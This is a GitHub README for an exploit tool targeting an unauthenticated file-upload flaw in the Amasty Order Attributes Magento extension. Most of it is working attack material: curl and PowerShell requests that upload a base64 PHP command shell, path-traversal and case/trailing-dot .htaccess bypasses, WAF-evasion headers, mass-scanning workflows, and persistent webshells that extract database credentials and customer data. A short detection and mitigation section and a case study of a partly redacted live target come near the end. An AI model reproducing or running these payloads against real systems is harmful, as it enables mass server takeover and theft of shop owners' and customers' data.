Skip to content

khadafigans/MAGENTO-AMASTY-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2026-53787: Amasty Order Attributes RCE Exploit

                                              VENI | VIDI | VICI

CVE ID: CVE-2026-53787
CVSS Score: 9.3 (Critical)
Affected Versions: Amasty Order Attributes ≤ 3.16.0
Patched Version: 4.0.0


Table of Contents


Overview

CVE-2026-53787 is a critical unauthenticated arbitrary file upload vulnerability in Amasty Order Attributes for Magento. This vulnerability allows remote attackers to upload malicious files without authentication, leading to Remote Code Execution (RCE) on vulnerable Magento installations.

Key Statistics

  • Vulnerability Type: Unauthenticated Arbitrary File Upload → RCE
  • Authentication Required: None (Completely Unauthenticated)
  • Attack Complexity: Low
  • CVSS 3.1 Score: 9.3 (Critical)
  • Affected Versions: Amasty Order Attributes ≤ 3.16.0
  • Patched Version: 4.0.0
  • Public Exploit: Available
  • Exploit Maturity: Weaponized (Full automation)

Impact

Unauthenticated RCE - Complete server takeover without login
Path Traversal - Escape upload directory restrictions (v3.16.0)
Extension Bypass - Evade file type restrictions (90+ techniques)
.htaccess Bypass - Case-sensitivity & trailing dot exploitation
WAF Bypass - Built-in headers for Cloudflare/ModSecurity/AWS WAF
Data Exfiltration - Access database credentials via Magento config
Persistence - Deploy persistent webshells (Bob Marley + Mage.php)


Vulnerability Details

Root Cause

The Amasty Order Attributes extension exposes unauthenticated REST API endpoints for file uploads:

POST /rest/V1/amasty_orderattr/uploadFile
POST /rest/all/V1/amasty_orderattr/uploadFile
POST /rest/default/V1/amasty_orderattr/uploadFile

Vulnerability Chain:

  1. Missing Authentication Check - No session/token validation
  2. Insufficient Filename Sanitization - Path traversal not properly filtered
  3. Weak Extension Filtering - Accepts dangerous file types (.php, .phar, .phtml)
  4. Directory Escape - Can write outside intended amasty_checkout folder

Attack Flow

1. Attacker sends POST request to /rest/V1/amasty_orderattr/uploadFile
   ↓
2. Server accepts upload WITHOUT authentication
   ↓
3. Filename: "../../../shell.php" → Path traversal to /media/
   ↓
4. File uploaded to: /pub/media/shell.php
   ↓
5. Attacker accesses: https://target.com/media/shell.php?cmd=id
   ↓
6. Remote Code Execution achieved! ✅

Affected Magento Installations

Vulnerable if:

  • ✅ Amasty Order Attributes extension installed (≤ v3.16.0)
  • ✅ REST API endpoints accessible
  • ✅ Version < 4.0.0

Note: This is NOT a general Magento vulnerability. Only sites with the Amasty Order Attributes extension are affected.


Exploit Features

🎯 Attack Capabilities

1. Intelligent Scanning

  • Automated Detection - Identifies vulnerable Amasty installations
  • Multi-Endpoint Testing - Tests 3 REST API endpoints per target
  • Response Analysis - Parses JSON responses to confirm vulnerability
  • Batch Processing - Scans thousands of targets with threading

2. Proof-of-Concept Upload

  • Harmless Text Files - Upload .txt files for non-destructive testing
  • Custom Markers - Configurable marker text (default: "Bob Marley is here")
  • Verification - Automatically checks if file is accessible
  • Mass Deployment - Upload PoC to hundreds of targets in parallel

3. Standard RCE (90+ Extensions)

  • PHP Extensions - .php, .phar, .phtml, .php5, .php4, .php3, .pht
  • Trailing Dots - .php., .phar., .phtml. (proven bypass)
  • Double/Triple Dots - .php.., .phar.., .phtml.., .phtml...
  • PHTML Case Variations - .PhTml, .pHtml, .PHTML, .pHtMl (33 variations)
  • PHT Variations - .pht, .phT, .pHt, .PHT, .pht., .phT..
  • Case Variations - .pHp, .phAr, .PHP, .PHP5, .PHAR
  • Null Bytes - .php%00.jpg, .phar%00.txt (truncation)
  • Double Extensions - .jpg.php, .txt.phar, .pdf.phar
  • Alternative - .inc, .inc., .module, .pgif
  • Parallel Testing - Tests all extensions simultaneously (8 workers default)
  • Auto-Verification - Uses id command to confirm RCE
  • Strict Filtering - Rejects HTML/PHP source code responses

4. Full Webshell Deployment

  • Bob Marley File Manager - Full-featured PHP webshell
    • File upload/download
    • File editor
    • Command execution
    • Directory browser
  • Mage.php Control Panel - Magento-specific data extraction
    • Database credentials
    • Admin accounts
    • Configuration dump
    • Customer data access
  • Multi-Extension Testing - Tries 40+ extensions until one executes

5. Path Traversal RCE

  • Directory Escape - ../../../filename to escape amasty_checkout/
  • Landing Locations:
    • /media/filename (v3.16.0) ✅ Most common
    • /pub/filename (v<2.4.2) ✅ Older versions
    • /pub/media/filename ✅ Partial escape
  • Security Boundary Aware - Respects 3-level max (4+ triggers error)
  • Multiple Payload Types - minimal, exec, passthru, system, shell_exec

6. WAF Bypass Headers

X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1

7. Verbose Mode

  • Detailed Logging - Shows every request/response
  • Upload Verification - Displays file paths and test URLs
  • RCE Testing - Shows command output in real-time
  • Debugging - Identifies why uploads/RCE fails

Quick Start

Installation

Requirements

# Python 3.x with libraries
pip3 install requests urllib3 colorama

Basic Usage

# Run the main exploit (interactive menu)
python3 amasty.py

# Interactive menu will appear
[1] Scan - Detect vulnerable Amasty installations
[2] PoC Upload - Harmless text file (configurable marker)
[3] Standard RCE - Multiple extensions (RECOMMENDED)
[4] Full Webshell - Bob Marley File Manager + Mage.php
[5] Custom Extensions - Test your own extensions
[6] Path Traversal - Escape to /pub (BYPASS .htaccess)
[0] Exit

[?] Select option:

Alternative Tool: amatest.py (Extension Bypass Tester)

Purpose: Dedicated .phtml extension bypass testing with both normal and path traversal methods

Features:

  • Tests 33+ .phtml case variations (.PhTml, .pHtml, .PHTML, etc.)
  • Two-stage testing:
    1. Normal upload → Test in /media/amasty_checkout/
    2. Path traversal → Test in /media/
  • Strict RCE validation (rejects HTML/PHP source code)
  • Mass testing with threading
  • Detailed method tracking (Normal vs Traversal)

Usage:

# Single target
python amatest.py -u https://target.com

# Mass testing
python amatest.py -l targets.txt

# High-speed scanning
python amatest.py -l targets.txt -t 20

Output:

[RCE-NORMAL] https://site.com | .PhTml | /media/amasty_checkout/a/b/shell.PhTml
[RCE-TRAVERSAL] https://site.com | .phtml. | /media/shell.phtml.

Results: AmaTest_Results_TIMESTAMP/
├── RCE_Shells.txt      # All working shells
└── Summary.txt         # Method success rates

When to use amatest.py:

  • ✅ Specifically testing .phtml case bypass techniques
  • ✅ Comparing normal upload vs path traversal effectiveness
  • ✅ Need strict false-positive filtering
  • ✅ Want detailed extension success statistics

When to use amasty.py:

  • ✅ Full attack chain (scan → PoC → RCE → webshells)
  • ✅ Interactive menu-driven workflow
  • ✅ Testing all 90+ extension variations
  • ✅ Deploying Bob Marley/Mage.php webshells

Attack Vectors

Vector 1: Scan for Vulnerabilities

Purpose: Identify vulnerable Magento sites running Amasty Order Attributes

Input: List of target URLs

Process:

  1. Tests 3 API endpoints per target
  2. Sends test upload payload
  3. Analyzes response (file path string = vulnerable)
  4. Saves vulnerable targets to Vulnerable.txt

Output: List of confirmed vulnerable sites

Example:

[?] Select option: 1
[?] Target list file path: targets.txt
[?] Threads (default 10): 20
[?] Verbose mode? (y/N): n

[*] Scanning 1000 targets with 20 threads...
[VULN] https://site1.com
[VULN] https://site2.com
[VULN] https://site3.com
...
[+] Found 47/1000 vulnerable targets
[+] Results saved: Amasty_Results_20260709_123456/Vulnerable.txt

Vector 2: Proof-of-Concept Upload

Purpose: Non-destructive verification of upload capability

Method: Upload harmless .txt files with custom marker

Verification: Checks if file is accessible at predicted URLs

Example:

[?] Select option: 2
[?] Marker text (default: Bob Marley is here): TEST123

[SUCCESS] https://site1.com
  URL: https://site1.com/media/amasty_checkout/a/b/abc123.txt
[SUCCESS] https://site2.com
  URL: https://site2.com/pub/media/amasty_checkout/x/y/xyz456.txt

[+] Success: 2/5
[+] Results: Amasty_Results_20260709_123456/PoC.txt

Vector 3: Standard RCE (RECOMMENDED)

Purpose: Achieve Remote Code Execution with multiple PHP extensions

Method:

  1. Uploads PHP payloads with 50+ different extensions
  2. Tests each extension in parallel (configurable workers)
  3. Verifies RCE using id command
  4. Saves working shells with detailed output

Extensions Tested (90+ variations):

Priority (Proven Effective):

  • Trailing Dots: .php. .phar. .phtml.Most reliable
  • Double/Triple Dots: .php.. .phar.. .phtml.. .phtml...
  • Case-Sensitive .phtml: .PhTml .pHtml .PHTML .pHtMlBypasses FilesMatch

Standard PHP Extensions:

  • .php .phar .phtml .php5 .php4 .php3 .pht .shtml

PHTML Case Variations (33 combinations):

  • Base: .phtml .PhTml .pHtml .PHTML .pHtMl .PHtml .phTml .phTmL .phtMl .PhTmL .pHTml .PHtMl
  • With Dots: .PhTml. .PhTml.. .pHtml. .pHtml.. .PHTML. .PHTML.. .pHtMl. .PHtml.. .phTml...

PHT Variations:

  • .pht .phT .pHt .PHT .pht. .phT..

Other Bypass Techniques:

  • Case Variations: .pHp .PHP5 .phAr .PhAr .PHAR .Php .PHP
  • Null Bytes: .php%00.jpg .phar%00.txt .phtml%00.gif
  • Double Extensions: .jpg.php .txt.phar .pdf.phar .txt.phtml
  • Alternative: .inc .inc. .module .pgif

Output Format (RCE.txt):

================================================================================
Target: https://site1.com
Working Extensions: 2
Time: 23.9s
================================================================================

Extension: .phar
Payload Type: minimal
Shell URL: https://site1.com/media/amasty_checkout/u/k/shell.phar
Test: curl 'https://site1.com/media/amasty_checkout/u/k/shell.phar?cmd=id'
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Extension: .php.
Payload Type: minimal
Shell URL: https://site1.com/pub/media/amasty_checkout/a/o/rce.php.
Test: curl 'https://site1.com/pub/media/amasty_checkout/a/o/rce.php.?cmd=id'
Output: uid=1000(magento) gid=1000(magento) groups=1000(magento)

Vector 4: Full Webshell Deployment

Purpose: Deploy persistent, feature-rich webshells for post-exploitation

Components:

  1. Bob Marley File Manager - Full web interface

    • Upload/Download files
    • Edit files (syntax highlighting)
    • Execute shell commands
    • Browse directories
    • File permissions management
  2. Mage.php Control Panel - Magento-specific tools

    • Database credentials extraction
    • Admin account enumeration
    • Configuration file reader
    • Customer data access

Method:

  1. Downloads Bob Marley shell from GitHub
  2. Tests 40+ extensions until one executes
  3. Deploys both Bob Marley and Mage.php
  4. Verifies PHP execution (not just file access)

Output:

Bob_Shells.txt:
https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4.phar

Mage_Shells.txt:
https://site1.com/media/amasty_checkout/b/o/bob_a1b2_mage.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4_mage.phar

Access:

https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
(Opens full file manager interface in browser)

Vector 5: Custom Extensions

Purpose: Test specific extensions for targeted exploitation

Use Case:

  • Target has custom PHP handlers (.php7, .pht)
  • Want to test specific extension bypass
  • Environment-specific extensions

Example:

[?] Select option: 5
[?] Extensions (comma separated): .php7, .pht, .inc

[SUCCESS] https://site1.com - Extension .php7 worked!
  Shell: https://site1.com/media/amasty_checkout/c/u/custom1.php7

Vector 6: Path Traversal (Advanced)

Purpose: Escape amasty_checkout directory to /media/ or /pub/

Why Important:

  • amasty_checkout folder may have .htaccess blocking PHP
  • /media/ root often allows PHP execution
  • /pub/ bypasses more restrictions

Method:

  1. Upload with filename: ../../../shell.php
  2. Server sanitizes to: /_/_/../../../shell.php
  3. Actually lands in: /media/shell.php

Security Boundary:

  • 3 levels max: ../../../ ✅ Escapes to /media/
  • 4 levels: ../../../../ ❌ Triggers security error

Successful Path Traversal Indicators:

Response: "\/_\/_\/..\/..\/..\/shell.php"

Testing:

curl "https://site.com/media/shell.php?cmd=id"
curl "https://site.com/pub/shell.php?cmd=id"
curl "https://site.com/pub/media/shell.php?cmd=id"

Example:

[?] Select option: 6

[RCE SUCCESS] https://site1.com
  Shell: https://site1.com/media/rce.php
  Payload: minimal | Path: ../../../rce.php
  
[RCE SUCCESS] https://site2.com
  Shell: https://site2.com/pub/media/shell.phar
  Payload: exec | Path: ../../../shell.phar

Usage Examples

Example 1: Full Attack Chain

# Step 1: Scan for vulnerabilities
python3 amasty.py
[?] Select option: 1
[?] Target list file path: magento-sites.txt
[?] Threads: 50
[?] Verbose mode? n

[+] Found 123 vulnerable targets
[+] Results: Amasty_Results_20260709_141523/Vulnerable.txt

# Step 2: Verify with PoC upload
[?] Select option: 2
[?] Marker text: CONFIRMED_VULN_2026

[+] Success: 118/123
[+] Results: Amasty_Results_20260709_141523/PoC.txt

# Step 3: Deploy webshells
[?] Select option: 4

[DEPLOYED] https://site1.com
  Webshell: https://site1.com/media/amasty_checkout/b/o/bob_x7y9.phar.
  Mage Shell: https://site1.com/media/amasty_checkout/b/o/bob_x7y9_mage.phar.

[+] Successful: 89/118
[+] Bob shells: Amasty_Results_20260709_141523/Bob_Shells.txt
[+] Mage shells: Amasty_Results_20260709_141523/Mage_Shells.txt

Example 2: Targeted RCE with Verbose Mode

python3 amasty.py

[?] Select option: 3
[?] Target list file path: single-target.txt
[?] Threads: 10
[?] Verbose mode? y
[?] Parallel workers: 15

[*] STANDARD RCE - Multiple Extension Testing
[*] Testing https://target.com with 51 extensions...

[VERBOSE] Testing extension .php. with file: abc123.php.
[VERBOSE] Uploading abc123.php. to: https://target.com/rest/V1/amasty_orderattr/uploadFile
[VERBOSE] Upload response: 200
[VERBOSE] Upload response body: /a/b/abc123.php.
[VERBOSE] Using actual path from response: /a/b/abc123.php.
[VERBOSE] Testing RCE at: https://target.com/media/amasty_checkout/a/b/abc123.php.?cmd=id
[VERBOSE] RCE test response: 200
[VERBOSE] RCE output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[VERBOSE] SUCCESS! Found uid= in output - RCE confirmed!

[SUCCESS] https://target.com - Extension .php. worked!
  Shell: https://target.com/media/amasty_checkout/a/b/abc123.php.

[+] Standard RCE testing complete!
[+] Results: Amasty_Results_20260709_143022/RCE.txt

Example 3: Path Traversal for Maximum Impact

python3 amasty.py

[?] Select option: 6

[*] PATH TRAVERSAL RCE - Escape to /media directory
[*] Testing 50 targets...

[RCE SUCCESS] https://site1.com
  Shell: https://site1.com/media/rce123.php
  Payload: minimal | Path: ../../../rce123.php
  
# Test the shell
$ curl "https://site1.com/media/rce123.php?cmd=whoami"
www-data

$ curl "https://site1.com/media/rce123.php?cmd=cat+/var/www/html/app/etc/env.php"
<?php
return [
    'db' => [
        'connection' => [
            'default' => [
                'host' => 'localhost',
                'dbname' => 'magento',
                'username' => 'mage_user',
                'password' => 'SuperSecret123!',
                ...

Manual Exploitation

Manual Testing (Windows CMD)

1. Test Vulnerability

curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"Qm9iIE1hcmxleSBpcyBIZXJl\",\"fileName_with_extension\":\"test.txt\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFile

Vulnerable Response:

"/t/e/test.txt"

Patched Response:

{"message":"Specified request cannot be processed."}

2. Upload PHP Shell

REM Payload: <?php system($_GET['cmd']); ?>
REM Base64: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\",\"fileName_with_extension\":\"shell.php.\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFile

Response:

"/s/h/shell.php."

3. Test RCE

curl "https://target.com/media/amasty_checkout/s/h/shell.php.?cmd=id"
curl "https://target.com/pub/media/amasty_checkout/s/h/shell.php.?cmd=id"

Success:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

4. Path Traversal Upload

curl -X POST -H "Content-Type: application/json" -d "{\"fileContent\":{\"base64_encoded_data\":\"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+\",\"fileName_with_extension\":\"../../../rce.php\"}}" https://target.com/rest/default/V1/amasty_orderattr/uploadFile

Response (Sanitized):

"\/_\/_\/..\/..\/..\/rce.php"

Test Paths:

curl "https://target.com/media/rce.php?cmd=id"
curl "https://target.com/pub/media/rce.php?cmd=id"
curl "https://target.com/media/amasty_checkout/_/_/../../../rce.php?cmd=id"

Manual Testing (PowerShell)

# Test vulnerability
$body = @{
    fileContent = @{
        base64_encoded_data = "Qm9iIE1hcmxleSBpcyBIZXJl"
        fileName_with_extension = "test.txt"
    }
} | ConvertTo-Json

Invoke-RestMethod -Uri "https://target.com/rest/default/V1/amasty_orderattr/uploadFile" -Method Post -Body $body -ContentType "application/json"

# Upload PHP shell
$phpShell = @{
    fileContent = @{
        base64_encoded_data = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+"
        fileName_with_extension = "shell.php."
    }
} | ConvertTo-Json

Invoke-RestMethod -Uri "https://target.com/rest/default/V1/amasty_orderattr/uploadFile" -Method Post -Body $phpShell -ContentType "application/json"

# Test RCE
Invoke-WebRequest -Uri "https://target.com/media/amasty_checkout/s/h/shell.php.?cmd=id"

Output Files

Directory Structure

Amasty_Results_YYYYMMDD_HHMMSS/
├── Vulnerable.txt          # Scan results
├── PoC.txt                # PoC upload URLs
├── RCE.txt                # Detailed RCE results
├── Bob_Shells.txt         # Bob Marley webshell URLs
├── Mage_Shells.txt        # Mage.php URLs
├── Custom_Shells.txt      # Custom extension URLs
└── PathTraversal_Shells.txt  # Path traversal shells

File Formats

Vulnerable.txt (Simple URL List)

https://site1.com
https://site2.com
https://site3.com

PoC.txt (Upload URLs)

https://site1.com/media/amasty_checkout/a/b/abc123.txt
https://site2.com/pub/media/amasty_checkout/x/y/xyz456.txt

RCE.txt (Detailed Format)

================================================================================
Target: https://site1.com
Working Extensions: 2
Time: 23.9s
================================================================================

Extension: .phar
Payload Type: minimal
Shell URL: https://site1.com/media/amasty_checkout/u/k/shell.phar
Test: curl 'https://site1.com/media/amasty_checkout/u/k/shell.phar?cmd=id'
Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Extension: .php.
Payload Type: exec
Shell URL: https://site1.com/pub/media/amasty_checkout/a/o/rce.php.
Test: curl 'https://site1.com/pub/media/amasty_checkout/a/o/rce.php.?cmd=id'
Output: uid=1000(magento) gid=1000(magento) groups=1000(magento)

Bob_Shells.txt & Mage_Shells.txt (Simple URL List)

https://site1.com/media/amasty_checkout/b/o/bob_a1b2.php.
https://site2.com/pub/media/amasty_checkout/b/o/bob_c3d4.phar

Technical Analysis

API Endpoints

POST /rest/V1/amasty_orderattr/uploadFile
POST /rest/all/V1/amasty_orderattr/uploadFile
POST /rest/default/V1/amasty_orderattr/uploadFile

Request Format

POST /rest/default/V1/amasty_orderattr/uploadFile HTTP/1.1
Host: target.com
Content-Type: application/json

{
  "fileContent": {
    "base64_encoded_data": "BASE64_ENCODED_CONTENT",
    "fileName_with_extension": "filename.ext"
  }
}

Response Formats

Vulnerable (Success):

"/c/h/char1char2filename.ext"

Vulnerable (Alternative):

{
  "file": "/path/to/file",
  "url": "https://site.com/media/...",
  "path": "/media/..."
}

Vulnerable (Empty Success):

{}

Patched (Error):

{
  "message": "attribute_code is required"
}

Security Boundary Error (4+ levels):

{
  "message": "Path \"%1\" cannot be used with directory \"%2\"",
  "parameters": [
    "amasty_checkout\/_\/_\/..\/..\/..\/..\/file.php",
    "\/var\/www\/html\/pub\/media\/"
  ]
}

File Storage Mechanism

Standard Upload:

Filename: abc123.php
Server: Extracts first 2 chars (a, b)
Storage: /media/amasty_checkout/a/b/abc123.php
Access: https://site.com/media/amasty_checkout/a/b/abc123.php

Path Traversal (v3.16.0):

Filename: ../../../shell.php
Server Sanitizes: /_/_/../../../shell.php
Actually Lands: /media/shell.php ✅
Access: https://site.com/media/shell.php

Path Traversal (v<2.4.2 - Older):

Filename: ../../../shell.php
Could Escape to: /pub/shell.php or /shell.php
More dangerous, but rare

Security Boundary

Maximum Escape: 3 directory levels

"../../../file.php"   # ✅ Allowed - Lands in /media/
"../../../../file.php"  # ❌ Blocked - Would escape /pub/media/

Error on 4+ levels:

"Path cannot be used with directory"
Shows full server path (info disclosure)

.htaccess Bypass Techniques

Why .htaccess Bypass is Critical

Problem: Magento's /pub/media/amasty_checkout/.htaccess blocks PHP execution:

<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
    SetHandler default-handler
</FilesMatch>

Solution: Bypass via case-sensitivity or path traversal to /media/

Bypass Method 1: Case-Sensitivity Exploitation

Vulnerability: FilesMatch regex is case-sensitive but Apache PHP handler is case-insensitive

Vulnerable Regex:

<FilesMatch ".*\.(phtml)$">
    SetHandler default-handler
</FilesMatch>

Exploitable Extensions:

✅ .PhTml   - Capital P, T, m
✅ .pHtml   - Capital H, m
✅ .PHTML   - All capitals
✅ .pHtMl   - Mixed case
✅ .phTml   - Capital T, m
... 33 variations total

How It Works:

1. Upload: shell.PhTml
   ↓
2. FilesMatch Check:
   Pattern: .*\.(phtml)$
   Input:   shell.PhTml
   Match:   NO (case mismatch - phtml != PhTml)
   Action:  Skip SetHandler (PHP handler NOT disabled)
   ↓
3. Apache MIME Handler:
   .phtml extension (case-insensitive)
   Action: Execute as PHP
   ↓
4. Result: ✅ RCE!

Proof of Concept:

# Upload with case variation
curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=","fileName_with_extension":"shell.PhTml"}}' \
  https://target.com/rest/V1/amasty_orderattr/uploadFile

# Execute  
curl "https://target.com/media/amasty_checkout/s/h/shell.PhTml?0=id"
# Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Bypass Method 2: Trailing Dot Exploitation

Vulnerability: FilesMatch regex uses $ anchor which requires exact end match

Vulnerable Regex:

<FilesMatch ".*\.(phtml)$">
    SetHandler default-handler
</FilesMatch>

Exploitable Extensions:

✅ .phtml.   - One trailing dot
✅ .phtml..  - Two trailing dots
✅ .phtml... - Three trailing dots
✅ .PhTml.   - Case variation + dot
✅ .PhTml..  - Case variation + double dot

How It Works:

1. Upload: shell.phtml.
   ↓
2. FilesMatch Check:
   Pattern: .*\.(phtml)$
   Input:   shell.phtml.
   Match:   NO (ends with '.' not 'l')
   Action:  Skip SetHandler
   ↓
3. Apache/OS Behavior:
   Linux/Windows: Trailing dots stripped or ignored
   Actual filename: shell.phtml (dot removed)
   ↓
4. Apache MIME Handler:
   Extension: .phtml
   Action: Execute as PHP
   ↓
5. Result: ✅ RCE!

Proof of Concept:

# Upload with trailing dot
curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+","fileName_with_extension":"rce.phtml."}}' \
  https://target.com/rest/V1/amasty_orderattr/uploadFile

# Execute (note: dot may or may not be in URL depending on server)
curl "https://target.com/media/amasty_checkout/r/c/rce.phtml?cmd=id"
curl "https://target.com/media/amasty_checkout/r/c/rce.phtml.?cmd=id"

Bypass Method 3: Path Traversal to /media/

Why: /media/ has a weaker .htaccess that allows certain extensions

/pub/media/.htaccess (Weak):

<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Vulnerable: Same case-sensitivity flaw!

Attack:

# Upload with path traversal + case bypass
curl -X POST -H "Content-Type: application/json" \
  -d '{"fileContent":{"base64_encoded_data":"PD9waHAgc3lzdGVtKCRfR0VUWzBdKTsgPz4=","fileName_with_extension":"../../../pwn.PhTml"}}' \
  https://target.com/rest/V1/amasty_orderattr/uploadFile

# File lands in /media/ instead of /media/amasty_checkout/
curl "https://target.com/media/pwn.PhTml?0=id"

Complete .htaccess Analysis

Default Magento /pub/media/.htaccess:

Options -Indexes

<IfModule mod_php7.c>
    php_flag engine 0
</IfModule>

<IfModule mod_php.c>
    php_flag engine 0
</IfModule>

AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

<FilesMatch ".*\.(ph(p[3457]?|t|tml)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>

Bypass Analysis:

Directive Purpose Bypassed By
AddHandler cgi-script .php Mark .php as CGI ❌ Only affects .php exactly
Options -ExecCGI Disable CGI execution ✅ Doesn't affect mod_php/PHP-FPM
php_flag engine 0 Disable mod_php ✅ Module-specific, doesn't affect all
FilesMatch .*\.(phtml)$ Disable PHP handler Case-sensitive! .PhTml bypasses

Comprehensive Extension Test Results

From Real-World Testing (production targets confirmed):

Extension Normal Upload Path Traversal Notes
.PhTml ✅ RCE ✅ RCE Most reliable
.pHtml ✅ RCE ✅ RCE Case bypass
.PHTML ✅ RCE ✅ RCE Uppercase
.pHtMl ✅ RCE ✅ RCE Mixed case
.phtml. ⚠️ Varies ✅ RCE Trailing dot
.phtml.. ⚠️ Varies ✅ RCE Double dot
.phT ✅ RCE ✅ RCE PHT variation
.pHt ✅ RCE ✅ RCE PHT variation

Total Working Extensions: 33+ .phtml variations alone

Fixed .htaccess (Recommended)

# Case-insensitive + trailing dot protection
<FilesMatch "(?i).*\.(ph(p[3457]?|t|tml\.?)|[aj]sp|p[ly]|sh|cgi|shtml?|html?)$">
SetHandler default-handler
</FilesMatch>

Changes:

  • (?i) = Case-insensitive matching
  • tml\.? = Optional trailing dot after phtml

Exploitation Workflow

Automated Workflow (Recommended)

graph TD
    A[Start] --> B[Load Target List]
    B --> C[Option 1: Scan]
    C --> D[Vulnerable Targets Found]
    D --> E[Option 2: PoC Upload]
    E --> F[Verify File Access]
    F --> G[Option 3: Standard RCE]
    G --> H{RCE Success?}
    H -->|Yes| I[Option 4: Deploy Webshells]
    H -->|No| J[Option 6: Path Traversal]
    J --> K{RCE Success?}
    K -->|Yes| I
    K -->|No| L[Option 5: Custom Extensions]
    L --> I
    I --> M[Access Webshells]
    M --> N[Post-Exploitation]
Loading

Manual Workflow

1. Identify Magento Site
   ↓
2. Test API Endpoint (curl POST)
   ↓
3. Analyze Response (JSON with file path = vuln)
   ↓
4. Upload PHP Shell (.php.)
   ↓
5. Construct Access URLs (char1/char2 logic)
   ↓
6. Test RCE (shell.php?cmd=id)
   ↓
7. Deploy Full Webshell
   ↓
8. Extract Database Credentials (app/etc/env.php)
   ↓
9. Maintain Persistence

Detection & Defense

Detection Methods

1. Monitor API Endpoints

# Apache/Nginx access logs
grep "/rest/.*amasty_orderattr/uploadFile" /var/log/nginx/access.log
grep "POST.*uploadFile" /var/log/apache2/access.log

Indicators:

  • Multiple POST requests to /rest/*/amasty_orderattr/uploadFile
  • Requests from unusual IPs
  • High frequency of 200 responses
  • Base64-encoded payloads in logs

2. File Integrity Monitoring

# Monitor upload directories
auditctl -w /var/www/html/pub/media/amasty_checkout/ -p wa -k amasty_upload
auditctl -w /var/www/html/pub/media/ -p wa -k media_upload

# Check for suspicious files
find /var/www/html/pub/media/amasty_checkout/ -name "*.php*" -o -name "*.phar*"
find /var/www/html/pub/media/ -maxdepth 1 -name "*.php*"

3. WAF Rules (ModSecurity)

# Block suspicious uploads to Amasty endpoints
SecRule REQUEST_URI "@contains /amasty_orderattr/uploadFile" \
    "id:1001,phase:2,t:none,t:lowercase,deny,status:403,\
    msg:'Amasty Upload Attempt Blocked'"

# Detect base64-encoded PHP payloads
SecRule REQUEST_BODY "@contains base64_encoded_data" \
    "chain,id:1002,phase:2,deny,status:403"
SecRule REQUEST_BODY "@contains PD9waHA" \
    "msg:'PHP Payload Detected'"

4. Cloudflare WAF Rules

(http.request.uri.path contains "/amasty_orderattr/uploadFile") and 
(http.request.method eq "POST") and
(not ip.src in {WHITELIST_IPS})

Mitigation Strategies

1. Immediate Actions

Update Amasty Extension:

# Update to v4.0.0 or higher
composer require amasty/module-order-attributes:^4.0.0
php bin/magento setup:upgrade
php bin/magento setup:di:compile
php bin/magento cache:flush

Temporary Workaround (If can't update immediately):

# Nginx - Block API endpoints
location ~ /rest/.*/amasty_orderattr/uploadFile {
    deny all;
    return 403;
}
# Apache - Block API endpoints
<LocationMatch "/rest/.*/amasty_orderattr/uploadFile">
    Require all denied
</LocationMatch>

2. Authentication Enforcement

Add API authentication requirement:

// app/code/Amasty/OrderAttributes/Plugin/RestAuth.php
public function beforeExecute($subject, $request)
{
    if (!$this->authContext->isAllowed()) {
        throw new \Magento\Framework\Exception\AuthenticationException(
            __('Authentication required')
        );
    }
}

3. File Upload Hardening

Disable PHP execution in upload directories:

# /pub/media/.htaccess
<FilesMatch "\.(php|php3|php4|php5|php7|phtml|phar|inc)$">
    Require all denied
</FilesMatch>
# nginx.conf
location ~* ^/pub/media/.*\.(php|php3|php4|php5|php7|phtml|phar|inc)$ {
    deny all;
}

4. Path Traversal Prevention

Sanitize filenames properly:

$filename = basename($filename);  // Remove directory components
$filename = preg_replace('/\.\.+/', '', $filename);  // Remove ..
$filename = preg_replace('/[^a-zA-Z0-9._-]/', '', $filename);  // Whitelist chars

5. Monitoring & Alerting

Set up alerts for:

  • New files in /pub/media/amasty_checkout/
  • PHP files in /pub/media/ root
  • Unusual POST requests to Amasty API
  • Failed authentication attempts

Example Alert (OSSEC):

<rule id="100001" level="10">
  <if_matched_regex>POST /rest/.*amasty_orderattr/uploadFile</if_matched_regex>
  <description>Amasty Order Attributes Upload Attempt</description>
</rule>

Real-World Examples

Case Study 1: [REDACTED] (Confirmed Vulnerable)

Target: https://[REDACTED-TARGET-1].com
Vulnerability Status: ✅ Confirmed vulnerable
Successful Extensions: 11+ working variations

Discovery:

# PoC Upload confirmed
https://[REDACTED-TARGET-1].com/media/customer_address/h/v/hvppdmpe.txt
